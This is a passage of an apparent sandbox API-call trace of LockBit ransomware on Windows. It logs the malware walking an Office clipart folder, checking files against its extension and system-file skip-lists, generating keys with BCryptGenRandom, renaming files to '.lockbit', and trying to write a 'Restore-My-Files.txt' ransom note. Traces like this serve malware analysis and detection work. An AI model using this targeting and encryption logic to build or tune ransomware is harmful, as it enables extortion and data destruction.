(lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.223] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.223] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.223] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.lockbit") returned 72 [0114.223] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0114.223] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.223] malloc (_Size=0x40068) returned 0x3d70450 [0114.224] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=17406) returned 1 [0114.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.224] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0114.224] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0114.225] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.290] malloc (_Size=0xa6) returned 0x77d7a8 [0114.290] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.396] free (_Block=0x77d7a8) [0114.396] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.396] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.396] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.397] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2774900, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa2774900, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00543_.WMF", cAlternateFileName="")) returned 1 [0114.397] lstrcmpiW (lpString1=".", lpString2="FD00543_.WMF") returned -1 [0114.397] lstrcmpiW (lpString1="..", lpString2="FD00543_.WMF") returned -1 [0114.397] PathFindExtensionW (pszPath="FD00543_.WMF") returned=".WMF" [0114.397] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.397] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.398] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.398] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00543_.WMF") returned 1 [0114.399] lstrcmpiW (lpString1="ntldr", lpString2="FD00543_.WMF") returned 1 [0114.399] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00543_.WMF") returned 1 [0114.399] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00543_.WMF") returned -1 [0114.399] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00543_.WMF") returned -1 [0114.399] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00543_.WMF") returned 1 [0114.399] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00543_.WMF") returned 1 [0114.399] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.399] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF") returned=".WMF" [0114.399] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.399] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.400] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.400] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.401] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.401] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.401] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.401] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.401] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.lockbit") returned 72 [0114.401] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0114.402] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.403] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.403] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1472) returned 1 [0114.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.404] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0114.408] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.408] malloc (_Size=0xa6) returned 0x77d7a8 [0114.408] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.409] free (_Block=0x77d7a8) [0114.409] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00543_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.409] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.409] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf50d3100, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf50d3100, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x148c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00544_.WMF", cAlternateFileName="")) returned 1 [0114.409] lstrcmpiW (lpString1=".", lpString2="FD00544_.WMF") returned -1 [0114.409] lstrcmpiW (lpString1="..", lpString2="FD00544_.WMF") returned -1 [0114.409] PathFindExtensionW (pszPath="FD00544_.WMF") returned=".WMF" [0114.409] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.410] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.411] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.411] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00544_.WMF") returned 1 [0114.412] lstrcmpiW (lpString1="ntldr", lpString2="FD00544_.WMF") returned 1 [0114.412] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00544_.WMF") returned 1 [0114.412] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00544_.WMF") returned -1 [0114.412] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00544_.WMF") returned -1 [0114.412] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00544_.WMF") returned 1 [0114.412] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00544_.WMF") returned 1 [0114.412] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.412] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF") returned=".WMF" [0114.412] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.412] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.412] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.413] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.414] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.lockbit") returned 72 [0114.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0114.419] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.419] malloc (_Size=0x40068) returned 0x3db04c0 [0114.419] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=5260) returned 1 [0114.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0114.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0114.420] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0114.425] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.425] malloc (_Size=0xa6) returned 0x77d7a8 [0114.425] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.426] free (_Block=0x77d7a8) [0114.426] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00544_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.426] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.426] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.426] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb4f600, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xecb4f600, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00564_.WMF", cAlternateFileName="")) returned 1 [0114.426] lstrcmpiW (lpString1=".", lpString2="FD00564_.WMF") returned -1 [0114.426] lstrcmpiW (lpString1="..", lpString2="FD00564_.WMF") returned -1 [0114.427] PathFindExtensionW (pszPath="FD00564_.WMF") returned=".WMF" [0114.427] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.427] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.428] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.428] 